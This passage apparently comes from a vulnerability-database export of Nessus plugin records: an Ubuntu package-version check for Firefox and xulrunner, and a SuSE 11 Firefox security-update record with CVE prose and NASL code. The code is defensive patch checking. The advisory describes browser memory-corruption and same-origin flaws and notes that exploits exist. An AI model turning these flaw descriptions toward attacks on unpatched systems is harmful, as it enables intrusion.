(ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-venkman\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-dbg\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-dev\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-gnome-support\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-testsuite\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-testsuite-dev\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-mozsymbols\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-mozsymbols\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrowser / abrowser-3.0 / abrowser-3.0-branding / abrowser-3.1 / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:56:54", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://support.novell.com/security/cve/CVE-2010-3179.html", "http://support.novell.com/security/cve/CVE-2010-3178.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "http://support.novell.com/security/cve/CVE-2010-3180.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://support.novell.com/security/cve/CVE-2010-3183.html", "http://support.novell.com/security/cve/CVE-2010-3170.html", "http://support.novell.com/security/cve/CVE-2010-3175.html", "http://support.novell.com/security/cve/CVE-2010-3174.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://support.novell.com/security/cve/CVE-2010-3765.html", "https://bugzilla.novell.com/show_bug.cgi?id=645315", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://support.novell.com/security/cve/CVE-2010-3177.html", "https://bugzilla.novell.com/show_bug.cgi?id=649492", "http://support.novell.com/security/cve/CVE-2010-3182.html", "http://support.novell.com/security/cve/CVE-2010-3176.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html"], "pluginID": "50876", "description": "This update brings Mozilla Firefox to version 3.6.12, fixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer. (MFSA 2010-65 / CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory. (MFSA 2010-66 / CVE-2010-3180)\n\n - Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.lookupGetter is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site. (MFSA 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript: URL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LDLIBRARYPATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Krokvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms. (MFSA 2010-73 / CVE-2010-3765)", "edition": 4, "reporter": "Tenable", "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : Mozilla Firefox (SAT Patch Numbers 3455 / 3456)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2013-11-27T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome-32bit"], "id": "SUSE_11_MOZILLAFIREFOX-101103.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50876", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50876);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:11:05 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Mozilla Firefox (SAT Patch Numbers 3455 / 3456)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings Mozilla Firefox to version 3.6.12, fixing various\nbugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor\n Bukanov and Josh Soref reported memory safety problems\n that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal\n reported memory safety problems that affected Firefox\n 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that\n passing an excessively long string to document.write\n could cause text rendering routines to end up in an\n inconsistent state with sections of stack memory being\n overwritten with the string data. An attacker could use\n this flaw to crash a victim's browser and potentially\n run arbitrary code on their computer. (MFSA 2010-65 /\n CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was\n possible to access the locationbar property of a window\n object after it had been closed. Since the closed\n window's memory could have been subsequently reused by\n the system it was possible that an attempt to access the\n locationbar property could result in the execution of\n attacker-controlled memory. (MFSA 2010-66 /\n CVE-2010-3180)\n\n - Security researcher regenrecht reported via\n TippingPoint's Zero Day Initiative that when\n window.lookupGetter is called with no arguments the code\n assumes the top JavaScript stack value is a property\n name. Since there were no arguments passed into the\n function, the top value could represent uninitialized\n memory or a pointer to a previously freed JavaScript\n object. Under such circumstances the value is passed to\n another subroutine which calls through the dangling\n pointer, potentially executing attacker-controlled\n memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that\n functions used by the Gopher parser to convert text to\n HTML tags could be exploited to turn text into\n executable JavaScript. If an attacker could create a\n file or directory on a Gopher server with the encoded\n script as part of its name the script would then run in\n a victim's browser within the context of the site. (MFSA\n 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a\n web page opened a new window and used a javascript: URL\n to make a modal call, such as alert(), then subsequently\n navigated the page to a different domain, once the modal\n call returned the opener of the window could get access\n to objects in the navigated window. This is a violation\n of the same-origin policy and could be used by an\n attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an\n SSL certificate was created with a common name\n containing a wildcard followed by a partial IP address a\n valid SSL connection could be established with a server\n whose IP address matched the wildcard range by browsing\n directly to the IP address. It is extremely unlikely\n that such a certificate would be issued by a Certificate\n Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch\n Mozilla applications on Linux was effectively including\n the current working directory in the LDLIBRARYPATH\n environment variable. If an attacker was able to place\n into the current working directory a malicious shared\n library with the same name as a library that the\n bootstrapping script depends on the attacker could have\n their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Krokvik of Telenor SOC reported an exploit\n targeting particular versions of Firefox 3.6 on Windows\n XP that Telenor found while investigating an intrusion\n attempt on a customer network. The underlying\n vulnerability, however, was present on both the Firefox\n 3.5 and Firefox 3.6 development branches and affected\n all supported platforms. (MFSA 2010-73 / CVE-2010-3765)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=645315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3170.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3174.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3455 / 3456 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", 